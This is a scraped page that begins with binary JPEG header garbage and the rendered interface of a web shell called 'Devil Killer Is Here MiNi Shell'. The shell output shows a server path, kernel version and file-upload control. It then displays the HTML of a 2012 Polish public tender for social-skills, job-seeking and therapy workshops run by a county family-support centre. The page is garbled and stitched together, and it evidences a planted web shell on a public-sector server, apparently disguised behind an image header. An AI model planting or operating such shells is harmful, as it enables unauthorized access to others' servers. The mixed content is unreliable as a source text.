JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120514/153024-N-2012.html

<p class="kh_header"><b>Kędzierzyn-Koźle: organizacja i przeprowadzenie warsztatów kompetencji i umiejętności społecznych, warsztatów z zakresu aktywnego poszukiwania pracy, warsztatów dot. przemocy i uzależnień, warsztatów kreowania własnego wizerunku, ergoterapii, arteterapii, konsultacji z doradcą zawodowym, konsultacji psychologicznych, konsultacji pedagogicznych oraz wsparcia psychologicznego rodzin dla uczestników projektu pn. Poszerz swoje możliwości nr POKL.07.01.02-16-001/12 realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Kędzierzynie - Koźlu.</b><br>
<b>Numer ogłoszenia: 153024 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Skarbowa 4, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 77 4833323, 4810282, faks 77 4833323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr@pcpr-kkozle.pl, www.biuletyn.abip.pl/pcprkedzierzyn-kozle</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i przeprowadzenie warsztatów kompetencji i umiejętności społecznych, warsztatów z zakresu aktywnego poszukiwania pracy, warsztatów dot. przemocy i uzależnień, warsztatów kreowania własnego wizerunku, ergoterapii, arteterapii, konsultacji z doradcą zawodowym, konsultacji psychologicznych, konsultacji pedagogicznych oraz wsparcia psychologicznego rodzin dla uczestników projektu pn. Poszerz swoje możliwości nr POKL.07.01.02-16-001/12 realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Kędzierzynie - Koźlu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie:
 WARSZTATÓW KOMPETENCJI I UMIEJĘTNOŚCI SPOŁECZNYCH dla 70 osób w 3 grupach: 
-1 grupa to osoby posiadające orzeczenie o stopniu niepełnosprawności; 
-2 grupa to osoby posiadające orzeczenie o niepełnosprawności w stopniu znaczmy lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej
-3 grupa to usamodzielniani wychowankowie placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych.    
WARSZTATÓW Z ZAKRESU AKTYWNEGO POSZUKIWANIA PRACY dla 53 osób w 2 grupach - uczestnikami są  osoby posiadające orzeczenie o stopniu niepełnosprawności z rożnych przyczyn oraz usamodzielniani wychowankowie placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych. 
WARSZTATÓW DOTYCZĄCYCH PRZEMOCY I UZALEŻNIEŃ dla 24 osób będących usamodzielnianymi wychowankami  placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych.  
WARSZTATÓW KREOWANIA WŁASNEGO WIZERUNKU DLA 25 niepełnosprawnych kobiet.
ERGOTERAPII - dla 17 osób niepełnosprawnych w stopniu znacznym lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej. 
ARTETEARPII - dla 16 osób iepełnosprawnych w stopniu znacznym lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej. 
KONSULTACJI Z DORADCĄ ZAWODOWYM dla osób niepełnosprawnych oraz usamodzielnianych wychowanków placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzieży przebywającej  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych obejmujące łącznie 211 godzin konsultacji. 
KONSULTACJI PSYCHOLOGICZNYCH dla osób niepełnosprawnych oraz usamodzielnianych wychowanków placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzieży przebywającej  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych obejmujące łącznie 267 godzin konsultacji. 
KONSULTACJI PEDAGOGICZNYCH DLA 24 usamodzielnianych wychowanków placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzieży przebywającej  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych, obejmujących 96 godzin konsultacji
WSPARCIE PSYCHOLOGICZNE RODZIN dla 3 rodzin zastępczych obejmujących 15 godzin konsultacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Dla części I i III przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zamówienie  posiada dyplom magistra psychologii lub dyplom magistra pedagogiki warunek ten muszą spełniać obydwoje wykładowcy.  
2.	Dla części II, XII, XIII, XIV przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zmówienie  posiada wykształcenie wyższe w zakresie lub o specjalności doradca zawodowy, lub wykształcenie wyższe oraz studia podyplomowe w zakresie doradca zawodowy lub wykształcenie wyższe z licencją doradcy zawodowego, lub inne studia wyższe wraz z doświadczeniem zawodowym w prowadzeniu warsztatów aktywnego poszukiwania pracy.  Powyższy warunek muszą spełnić obydwoje wykładowcy.
3.	Dla części  XII, XIII, XIV przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zmówienie  posiada wykształcenie wyższe w zakresie lub o specjalności doradca zawodowy, lub wykształcenie wyższe oraz studia podyplomowe w zakresie doradca zawodowy lub wykształcenie wyższe z licencją doradcy zawodowego.  Powyższy warunek muszą spełnić obydwoje wykładowcy.
4.	Dla części IV przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zamówienie posiadanie odpowiednie kwalifikacje zawodowe, w przypadku fryzjera - stylisty  ukończona szkoła średnia w zawodzie fryzjer lub szkoła zawodowa o profilu fryzjerskim lub szkoła policealna o profilu fryzjerskim poświadczone dyplomem potwierdzającym kwalifikacje, w przypadku kosmetyczki - ukończona szkoła średnia wraz z kursem kosmetycznym lub szkoła policealna o profilu kosmetycznym. 
5.	Dla części V przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zamówienie  posiada odpowiednie kwalifikacje zawodowych, wykształcenie wyższe o kierunku psychologia w przypadku konsultacji psychologicznych, wykształcenie wyższe o kierunku pedagogiczne ze specjalizacją logopedia w przypadku konsultacji logopedycznych,  wykształcenie wyższe o kierunku fizjoterapia lub rehabilitacja w przypadku osoby prowadzącej zajęcia psychoruchowe potwierdzone stosownym dyplomem. 
6.	Dla części VI przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zamówienie posiada dyplom magistra pedagogiki specjalnej. 
7.	Dla części VII, VIII, IX, X, i XI przedmiotu zamówienia warunek uznaje się za spełniony jeżeli osoba wykonująca zmówienie  posiada dyplom magistra psychologii.
8.	Dla części XV przedmiotu zamówienia warunek uznaje się za spełniony jeżeli wykonawca w posiada dyplom magistra pedagogiki .
Warunek  oceniany w systemie spełnia/ nie spełnia na podstawie złożonych przez wykonawcę dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykaz wykonywanych  w okresie ostatnich trzech lat przed upływem terminu składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonywanych należycie usług tożsamych lub zbliżonych w zakresie jakiego dotyczy składana oferta z podaniem przedmiotu, dat wykonania, odbiorców oraz liczby osób objętych usługą oraz załączaniem dokumentu potwierdzającego że te usługi zostały wykonane należycie. Jako potwierdzenie należycie wykonanej usługi należy złożyć rekomendacje, referencje lub listy polecające. 
2.	Warunek uzna się za spełniony jeżeli wykonawca wykaże się w tym okresie co najmniej 1 wykonaną  należycie usługę w zakresie jakiego dotyczy składana oferta. 
3.	W przypadku ofert wspólnych wszyscy wykonawcy muszą spełniać warunek. Warunek oceniany w systemie spełnia nie spełnia  na podstawie złożonych przez wykonawcę dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis posiadanego przez jednostkę zaplecza do przeprowadzenia zajęć, z podaniem dokładnego adresu /miejscowość, kod pocztowy, ulica, numer budynku oraz numer sali wraz z informacją o podstawie dysponowania dotyczy części IV, V, VI. 
Warunek oceniany w systemie spełnia/ nie spełnia na podstawie złożonych przez Wykonawcę dokumentów.
Warunek zostanie spełniony jeśli Wykonawca dysponuje:
1.	w przypadku części IV zamówienia salą mogącą pomieścić 25 osób na zajęcia grupowe oraz co najmniej jednym stanowiskiem fryzjersko - kosmetycznym do przeprowadzenia usługi fryzjerskiej i kosmetycznej. Miejscem wykonania usługi musi posiadać zniesione bariery architektoniczne. Dwie uczestniczki poruszają się na wózku inwalidzkim. 
2.	W przypadku części V  dysponuje salą do przeprowadzenia indywidualnych konsultacji oraz do przeprowadzenia zajęć psychoruchowych na terenie miasta Kędzierzyn - Koźle w miejscu do którego możliwy jest dojazd komunikacją miejską. Miejscem wykonania usługi musi posiadać zniesione bariery architektoniczne. Troje uczestników porusza się na wózku inwalidzkim.
3.	W przypadku części VI zamówienia, salą mogącą pomieścić 16 osób na zajęcia grupowe na terenie miasta Kędzierzyn - Koźle w miejscu do którego możliwy jest dojazd komunikacją miejską. Miejscem wykonania usługi musi posiadać zniesione bariery architektoniczne. Troje  uczestników porusza się na wózku inwalidzkim. Wykonawca powinien  dysponować sprzętem do przeprowadzenia zajęć aktywnych z muzykoterapii chromatoterapii oraz twórczości plastycznej
Wykonawca może polegać na wiedzy i doświadczeniu potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z innymi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
W przypadku ofert wspólnych, wystarczy aby jeden wykonawca spełnił wyżej wymienione warunki. Warunek ocenienia w systemie spełnia / nie spełnia na podstawie złożonych przez Wykonawcę dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykaz osób które będą uczestniczyć w wykonywaniu zamówienia załącznik nr 6 do formularza oferty. 
2.	Oświadczenie wykonawcy dotyczące osób wykazanych w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia o posiadaniu przez te osoby wymaganych uprawnień, kwalifikacji zawodowych oraz wykształcenie niezbędne do realizacji zamówienia objętego ofertą. (załącznik nr 6A do formularza oferty) 
3.	Oświadczenie o zatrudnieniu w instytucji realizującej POKL - Niekwalifikowane jest wynagrodzenie personelu projektu zatrudnionego jednocześnie w instytucji uczestniczącej w realizacji POKOL na podstawie stosunku pracy, chyba że nie zachodzi konflikt interesów. Zgodnie z Wytycznym w zakresie kwalifikowania wydatków w ramach POKL. (załącznik nr 9 do formularza oferty) 
4.	Wydatki związane z zaangażowaniem osoby wykonującej zadania w więcej niż jednym projekcie są kwalifikowane o ile: 
- obciążenie z tego wynikające nie wyklucza możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych danej osobie. 
- łączne zaangażowanie w realizację zadań we wszystkich projektach NSRO nie przekracza 240 godzin miesięcznie. Zgodnie z Wytycznym w zakresie kwalifikowania wydatków w ramach POKL. (załącznik nr 10 do formularza oferty)
Warunek oceniany w systemie spełnia / nie spełnia na podstawie złożonych przez Wykonawcę dokumentów. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjalne technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 22. Ustawy 
Warunek oceniany w systemie spełnia / nie spełnia na podstawie złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>należy złożyć - oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu na mocy art 22 ustawy Prawo zamówień publicznych. W przypadku ofert składanych wspólnie należy złożyć pełnomocnictwo. Pełnomocnictwo powinno zawierać podpisy każdego z wykonawców którzy występują wspólnie. W przypadku spółki cywilnej każdego wspólnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający przewiduje istotne zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy dotyczące zmiany liczby osób kierowanych na warsztaty oraz konsultacje przewidując możliwość rezygnacji z uczestnictwa w projekcie uczestników w granicach od 1 do 5 osób. Tym samym Zamawiający zapłaci wykonawcy za faktycznie zrealizowaną ilość godzin.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/pcprkedzierzyn-kozle, www.pcpr-kkozle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Kędzierzynie - Koźlu, ul Skarbowa 4, 47-200 Kędzierzyn - Koźle, biuro projektu w poniedziałek od 8-16 od wtorku do piątku od 7-15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Kędzierzynie - Koźlu, ul Skarbowa 4, 47-200 Kędzierzyn - Koźle.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów kompetencji i umiejętności społecznych, warsztatów z zakresu aktywnego poszukiwania pracy, warsztatów dot. przemocy i uzależnień, warsztatów kreowania własnego wizerunku, ergoterapii, arteterapii, konsultacji z doradcą zawodowym, konsultacji psychologicznych, konsultacji pedagogicznych oraz wsparcia psychologicznego rodzin dla uczestników projektu pn Poszerz swoje możliwości nr POKL.07.01.02-16-001/12 realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Kędzierzynie - Koźlu. Projekt Poszerz swoje możliwości jest współfinansowany ze  środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Podziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 70 osób w 3 grupach: 
-1 grupa to osoby posiadające orzeczenie o stopniu niepełnosprawności; 
-2 grupa to osoby posiadające orzeczenie o niepełnosprawności w stopniu znaczmy lub umiarkowanym z tytułu niepełnosprawności umysłowej, psychicznej lub neurologicznej
-3 grupa to usamodzielniani wychowankowie placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztaty aktywnego poszukiwania pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 53 osób w 2 grupach - uczestnikami są  osoby posiadające orzeczenie o stopniu niepełnosprawności z rożnych przyczyn oraz usamodzielniani wychowankowie placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty dotyczące przemocy i uzależnień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 24 osób będących usamodzielnianymi wychowankami  placówek opiekuńczo wychowawczych lub rodzin zastępczych oraz młodzież przebywająca  w placówkach opiekuńczo wychowawczych lub rodzinach zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztaty kreowania własnego wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 25 niepełnosprawnych kobiet..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
